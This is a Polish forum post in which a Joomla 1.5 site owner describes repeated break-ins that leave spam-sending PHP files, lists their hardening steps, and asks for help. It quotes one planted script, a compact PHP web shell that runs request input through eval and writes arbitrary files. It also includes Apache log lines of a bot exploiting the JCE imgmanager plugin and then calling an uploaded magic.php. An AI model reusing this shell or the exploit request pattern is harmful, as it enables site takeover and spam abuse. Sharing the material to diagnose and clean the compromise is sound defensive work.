Od kilku miesięcy męcze się z "padającą" stroną .

nieustanie wrzucane są na serwer pliki PHP które sieją zament i wysyłają spam


uczyniłem wszytko co mogłem aby zrobić witrynę bezpiecznejszą :
1. zmiana ID administratora i loginu oraz haslo (teraz jakies 28 znaków...)
2. zainstalowanie admintool's
3. żadnych więcej urzytkowników w systemie poza "adminem"
4. zainstalowany dodatek spadaj.
5. dostęp do edytorów typu JCE z poziomu user rejstrowany.
6. zainstalowan "nieoficjalna" łatka do wersji 1.5.26

oto jeden z skryptów (powielony wielokrotnei w różnych katalogach po włamaniu) :

(((?php $dvtp = "4b64b38c89efc733990dc6893a32077a"; if(isset($_REQUEST['jpkellw'])) { $vfhoxbn = $_REQUEST['jpkellw']; eval($vfhoxbn); exit(); } if(isset($_REQUEST['wojooidk'])) { $thxcqqmg = $_REQUEST['qrmm']; $isqwq = $_REQUEST['wojooidk']; $jpoyydm = fopen($isqwq, 'w'); $gxfae = fwrite($jpoyydm, $thxcqqmg); fclose($jpoyydm); echo $gxfae; exit(); }
?))) (celowa zmiana nawiasów)

a oto fragment logu apaha z dziś który wzbudził moje wątpliwości:

162.144.47.100 - - [02/Mar/2014:14:36:36 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 348 "-" "BOT/0.1 (BOT for JCE)"
162.144.47.100 - - [02/Mar/2014:14:36:36 +0100] "POST /component/content/frontpage/index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 348 "-" "BOT/0.1 (BOT for JCE)"
162.144.47.100 - - [02/Mar/2014:14:36:36 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&method=form&cid=20&6bc427c8a7 981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 404 839 "-" "BOT/0.1 (BOT for JCE)"
162.144.47.100 - - [02/Mar/2014:14:36:36 +0100] "POST /component/content/frontpage/index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&method=form&cid=20&6bc427c8a7 981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 404 839 "-" "BOT/0.1 (BOT for JCE)"
162.144.47.100 - - [02/Mar/2014:14:36:37 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 348 "-" "BOT/0.1 (BOT for JCE)"
162.144.47.100 - - [02/Mar/2014:14:36:37 +0100] "POST /component/content/frontpage/index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&version=1576&cid=20 HTTP/1.1" 303 348 "-" "BOT/0.1 (BOT for JCE)"
162.144.47.100 - - [02/Mar/2014:14:36:37 +0100] "POST /index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&method=form&cid=20&6bc427c8a7 981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 404 839 "-" "BOT/0.1 (BOT for JCE)"
162.144.47.100 - - [02/Mar/2014:14:36:37 +0100] "POST /component/content/frontpage/index.php?option=com_jce&task=plugin&plugin=imgman ager&file=imgmanager&method=form&cid=20&6bc427c8a7 981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c 8e20b HTTP/1.1" 404 839 "-" "BOT/0.1 (BOT for JCE)"
162.144.47.100 - - [02/Mar/2014:14:36:41 +0100] "GET /images/stories/magic.php?rf HTTP/1.1" 404 1955 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
162.144.47.100 - - [02/Mar/2014:14:36:41 +0100] "GET /component/content/frontpage/images/stories/magic.php?rf HTTP/1.1" 200 21415 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

Proszę o porade co jeszcze mogę zrobić lub czy ktoś już się już borykał się z takowym problemem

administrator juz nalega ostro na mnie że czas na porzucenie tego cms ale ja ciągle wierze ze to nie widna samej Joomli
tylko gdzieś jeszcze coś jest nie tak ... moze jakis component może jeszcze jakiś back door... sam juz nie wiem .